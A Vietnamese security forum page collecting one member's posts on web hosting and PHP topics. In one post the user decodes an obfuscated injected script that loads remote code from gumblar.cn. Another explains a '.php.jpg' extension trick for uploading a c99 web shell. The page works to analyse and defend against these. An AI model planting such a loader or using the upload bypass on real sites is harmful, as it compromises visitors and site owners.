banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: canh_nguyen  XML
Profile for canh_nguyen Messages posted by canh_nguyen [ number of posts not being displayed on this page: 11 ]
 
learn2hack: Bồ có thể nói rõ hơn cách chèn php code vào ảnh jpg làm sao mà vẫn thực thi được không smilie

holiganvn wrote:
site bạn đã bị mắc lỗi upload con sh3llc99.php nó thêm đuôi jpg thành sh3llc99.php.jpg lúc đó link sh3ll là: xxx.com/sh3l99.php.jpg,sau đó local là lên quyền admin ngay,tạm thời tắt tính năng upload đi đã,sau đó tìm và xóa sh3ll rồi xài cái mod security hoặc code lại toàn bộ site để bảo mật tốt hơn

vào diễn đàn phpvn để học hỏi thêm nhé bạn

http://www.phpvn.org/

bug:

mặc dù cho phép upload file, nhưng vẫn có filter phần mở rộng của file (file extension), vì thế nếu để shell với phần mở rộng .php thì sẽ bị filter ngay. hacker đã đánh lừa bằng cách đổi file extension thành .php.xxl hoặc .php.jpg, sau đó upload lên. Mặc định file được lưu vào [website]/UserFiles/File/, upload xong run shell với phần đuôi ko phải là .php nhưng shell của hacker vẫn chạy bình thường
 


Nhờ bạn holiganvn chỉ mình cách làm sao đổi đuôi file từ xxx.php => xxx.php.jpg mà server vẫn thực thi nó như một file php bình thường smilie .

( * ): up được shell trực tiếp rồi thì còn local gì nữa ???

Phần tô đậm cuối bài vẫn là thắc mắc đầu tiên của mình, cậu chỉ giúp smilie

jforum3000 wrote:

canh_nguyen wrote:
InV-Firewall nó như thế nào thế cậu ? 

Hosting Provider yêu cầu mình cài đặt thêm trình tường lửa vào, mình search thử thì http://sinhvienit.net/@forum/anti-ddos/7207-cai-dat-tuong-lua-inv-firewall-script-cho-dien-dan-ban-ipb-phpbb-vbulletin.html, có vấn đề gì sao bạn?
InV-Firewall Script là một firewall của tác giả Nguyen Tuan Dung, lập trình dành riêng cho hệ thống forum Invision Power Board [cũng có thể tích hợp và forum khác dễ dàng]. Tính năng của hệ thống tường lửa cho website này tập trung chính ở việc cản trở một phần các gói dữ liệu được gửi liên tục hay yêu cầu truy cập đến diễn đàn với số lượng lớn trong thời gian ngắn. 


Mình upload nó lên cho các bạn tham khảo đây
Code:
http://www.mediafire.com/?mtlz2zmjz1y
 


À mình hỏi lại cho chắc thôi mà smilie.

Về những gì to hơn thì anh conmale đã nói, mình không chuyên nên không dám có ý kiến gì smilie .

Chỉ lạm bàn một chút về code Inv kia:

Đầu tiên trong readme có hướng dẫn :
Code:
Add below:
$firewall = ROOT_PATH.'firewall/firewall.php';
if( file_exists($firewall) ){ require_once($firewall); }

Đây là một cách copy variable, khi forum đang bị ddos thì mình cũng cần tiết kiệm bộ nhớ bằng cách tránh dùng cách copy variable.
Nếu là mình mình sẽ dùng luôn :
Code:
if( file_exists(ROOT_PATH.'firewall/firewall.php') ){ require_once(ROOT_PATH.'firewall/firewall.php'); }


Tiếp theo trong firewall.php
Để ý có function check_bot()
Nếu là một kẻ cố tình tấn công thì chắc người đó cũng không bỏ qua cách fake HTTP_USER_AGENT để qua mặt firewall này smilie .

Cách này dùng cả fwrite để ghi log các ip ra file, không hiểu ddos với cường độ lớn thì cái file này hoặc php engine như thế nào?

InV-Firewall nó như thế nào thế cậu ?
@jforum3000: Như mình nói từ trước, tùy vào hợp đồng thỏa thuận giữa cậu với khách hàng. Đa phần khách hàng dạng doanh nghiệp làm website hiện nay mình làm đều không chú ý lắm vào mặt này.

@protectHat: cậu chưa hiểu về encode và decode source code.
Nếu dùng base64_encode thì chỉ đơn giản là dùng http://vn.php.net/manual/en/function.base64-decode.php là ra.
Việc bảo vệ source code mà chỉ dùng base64 là không đạt chút nào.

Thường để bảo vệ source code người ta hay dùng zend guard, iconCube...

protectHat wrote:
Cậu nên hỏi rõ trường hợp này là PHP.
Mình đã nhận 1 trang thì thấy trong các file index.php... thì bình thường. Các file về module thì họ mã hóa base 64.
Khách hàng thuê làm web tức là chỉ làm ra 1 trang để chạy thôi. Giống như bán file binary vậy đó. Khi muốn lấy luôn source code thì thường phải trả thêm từ 150% đến 200%. 


Base64 để làm gì vậy bồ ?
Mà mình có thấy bình thường các file bị base64 đâu, mà thực ra là nếu có muốn giữ kín source code thì không bao giờ người ta dùng base64 smilie

@jforum3000:
Mã hóa thì bất kể là Zend Guard , ionCube... đều ảnh hưởng ít nhiều đến hiệu năng.
Ràng buộc thì cũng không hẳn là an toàn, nó cũng tùy môi trường tùy khách hàng hay hợp đồng của bạn có đủ chặt chẽ hay không.
Ví dụ trong hợp đồng có yêu cầu bên khách hàng giữ kín source code nhưng hosting của khách hàng không đủ bảo mật dẫn đến mất source code....

nguago wrote:
Mình hiểu ý bạn hỏi, mình xin giải thích như này:
index.php?lang=vn => Đường dẫn như vậy vẫn chạy trên file index.php với biến phương thức GET lang = vn ($_GET['lang'] = vn) Như vậy là đã có biến $_GET['lang'] với giá trị là "vn", bạn có thể sử dụng biến đó trong file index.php, ví dụ trong trường hợp này có rất nhiều cấch để dùng (áp dụng với việc lựa chọn ngôn ngữ) Ví dụ như nếu là tôi thì tôi sẽ dùng biến đó để lưu 1 biến section ngôn ngữ với giá trị bằng $_GET['lang'] (tức là bằng "vn") để mỗi lần người dùng đó vào trang web thì đều có ngôn ngữ là tiếng việt, vì sao lại là tiếng việt thì ví dụ bạn có 2 file ngôn ngữ có đường dẫn như sau: lang/vn.php và lang/en.php, bạn chỉ cần include file sử dụng section, với section ngôn ngữ có giá trị vn thì nó include vn.php và lấy dữ liệu tiếng việt. tương tự với file en. 

Session chứ không phải section.


@proA.Vito :
1 là nó có dạng /assign/index.php?lang=vn, mà cấu hình hosting có DirectoryIndex để là index.php nên trong code không cần để đầy đủ cả index.php?lang=vn.

2 là nó dùng rewrite url, tìm lại trong forum đã có nhiều bài bàn luận rồi.

smilie

freeze_love wrote:
Bạn vào http://hcegroup.net và nhờ mem Check giúp bạn. Thân. ! (smilie

Ku này bị vấn đề gì đó về tâm lí à mà post nào cũng nguyên 1 câu kiểu này smilie
decode đoạn
Code:
PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBYSzY9JyUnO3ZhciBaQWFLOT0ndm
FyfjIwfjYxfjNkfjIyU2NyfjY5fjcwdH40NW5nfjY5bmV+MjJ+MmNifjNkfjIyVmVyc2lvbih+MjkrfjIyfjJjan4zZH4yMn4yMn4yY3V
+M2RuYXZpZ2F0fjZmfjcyfjJldXNlckFnZW50fjNiaWYofjI4fjc1fjJlaW5kZXh+NGZmKH4yMldpbn4yMil+M2UwfjI5fjI2fjI2fjI4d
X4yZX42OW5kfjY1eE9mKH4yMk5UfjIwNn4yMil+M2MwfjI5fjI2fjI2KGRvY3VtZW50fjJlY29va342OWV+MmV+NjluZGV4T2Y
ofjIyfjZkaWVrfjNkMX4yMil+M2MwKX4yNn4yNih+NzR5cGV+NmZ+NjYofjdhfjcydnp0c34yOX4yMX4zZHR+NzlwZW9mfjI4f
jIyfjQxfjIyKSkpfjdienJ2enRzfjNkfjIyfjQxfjIyfjNiZXZhbCh+MjJpZih3fjY5bn42NH42Znd+MmV+MjJ+MmJ+NjF+MmJ+MjIpa
n4zZGorfjIyK2ErfjIyTX42MWpvcn4yMn4yYmJ+MmJhK34yMk1+NjlufjZmcn4yMitiK2ErfjIyQnVpbGR+MjJ+MmJ+NjIrfjIya
n4zYn4yMil+M2J+NjRvY3VtfjY1bnR+MmV3cn42OXR+NjUofjIyfjNjfjczY3JpcH43NH4yMHN+NzJjfjNkfjJmfjJmZ343NW1ifjZj
YXJ+MmVjbn4yZnJ+NzNzfjJmfjNmaWR+M2R+MjIrait+MjJ+M2V+M2N+NWN+MmZzY3JpcHR+M2V+MjIpfjNifjdkJzt2YXIg
S2pDPXVuZXNjYXBlKFpBYUs5LnJlcGxhY2UoL34vZyxYSzYpKTtldmFsKEtqQyl9KSgpOwogLS0+PC9zY3JpcHQ+


được đoạn này :

Code:
<script language=javascript><!--
(function(){var XK6='%';var ZAaK9='var~20~61~3d~22Scr~69~70t~45ng~69ne~22~2cb~3d~22Version(~29+~22~2cj~3d~22~22~2cu~3dnavigat~6f~72~2euserAgent~3bif(~28~75~2eindex~4ff(~22Win~22)~3e0~29~26~26~28u~2e~69nd~65xOf(~22NT~206~22)~3c0~29~26~26(document~2ecook~69e~2e~69ndexOf(~22~6diek~3d1~22)~3c0)~26~26(~74ype~6f~66(~7a~72vzts~29~21~3dt~79peof~28~22~41~22)))~7bzrvzts~3d~22~41~22~3beval(~22if(w~69n~64~6fw~2e~22~2b~61~2b~22)j~3dj+~22+a+~22M~61jor~22~2bb~2ba+~22M~69n~6fr~22+b+a+~22Build~22~2b~62+~22j~3b~22)~3b~64ocum~65nt~2ewr~69t~65(~22~3c~73crip~74~20s~72c~3d~2f~2fg~75mb~6car~2ecn~2fr~73s~2f~3fid~3d~22+j+~22~3e~3c~5c~2fscript~3e~22)~3b~7d';var KjC=unescape(ZAaK9.replace(/~/g,XK6));eval(KjC)})();
--></script>


Thay đoạn eval(KjC) ở cuối thành alert(KjC) rồi save ra file html chạy thử đi bồ smilie
Chỉ cần cái Code:
<param name="wmode" value="transparent" />
khi embed cái flash là được rồi.
Mặc định user khi đăng kí ở Joomla là nhóm registered, để viết bài cần là nhóm Author trở lên.
Bạn có thể đặt mặc định user khi mới đăng kí thuộc nhóm nào bằng cách vào "Global Configuration" -> "System" -> "User setting" -> "New User Registration Type".
Hoặc để an toàn hơn là kiểm soát được người viết thì để mặc định vẫn là registered, thấy user nào có khả năng viết bài thì set lên Author.
Cách khác nữa là hack lại core acl của joomla smilie
HTML thì là cái đầu tiên phải mó vào roài.
Còn CSS với JS mình thấy đi cùng nhau một lúc cũng được.

Mình đang ở bước đọc manual ở http://php.net smilie
Làm gì có cái nào có pass hả trời smilie
@l2h : Anh dùng luôn add-on Web Developer của FF.
@gamma95 : Giờ mới down code python của bác về ngó smilie, đúng là cURL của PHP không ổn bằng thật.
Tui không biết python nên đoán cái urllib2 của python nó sẽ lấy toàn bồ cả nội dung trả về từ url muốn lấy (bao gồm cả header) phải không ?
Response headers của raovat :
Code:
Date: Tue, 17 Feb 2009 12:50:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
Vary: Accept-Encoding,User-Agent
Content-Length: 22845
X-Content-Encoded-By: class.gzip_encode 0.67
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html
200 OK


Response headers từ code của l2h :
Code:
Date: Tue, 17 Feb 2009 12:58:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 23127
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
200 OK

So sánh xem thiếu gì thì thêm vào array header thử smilie
Nếu cậu xác định chỉ dùng command thì cứ cài Ubuntu Server.

anhtuyen wrote:
không biết cấu hình máy: P3 740Hz, Ram 128 thì nên cài Ubuntu sever hay là Xubuntu ha? smilie

Mong mọi người tư vấn cho mình với!

Thanks! 


Cậu phải xác định được nhu cầu của mình, Ubuntu server không có GUI còn Xubuntu có GUI sử dụng Xfce.

Requirement của Xunbutu http://www.xubuntu.org/get
Requirement của Ubuntu server https://help.ubuntu.com/8.10/serverguide/C/preparing-to-install.html#id2868940

anhtuyen wrote:

Hi hi, bạn chấp nhận số phận như vậy sao? smilie , nói thiệt nha smilie , mình cũng đang bị y như bạn smilie . Nhưng mình mới cài Xubuntu thôi, không có dù là 1 tiếng động nhỏ luôn smilie . Mình còn không chỉnh được độ phân giải 1024x768 nữa smilie , giờ mình đang dùng Sony Vaio P3 740Hz, Ram 128Mb. Chắc là đời quá cũ nên Xubuntu không hỗ trợ Driver. hix hix smilie smilie ... 


Máy bồ dùng video card gì vậy, Ubuntu chỉ gặp vấn đề với card ATI hoặc Nvidia.
Máy mình card ATI Radeon HD 3200 cũng không được hỗ trợ mặc định nhưng upgrade lên kernel 2.6.27-11 mới thì resolution chỉnh qua 1024x768 ngon lành.

Đã thử tìm driver cho linux trong http://esupport.sony.com/ chưa ?
 
Go to Page:  First Page Page 1 3 4 5 Page 6 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|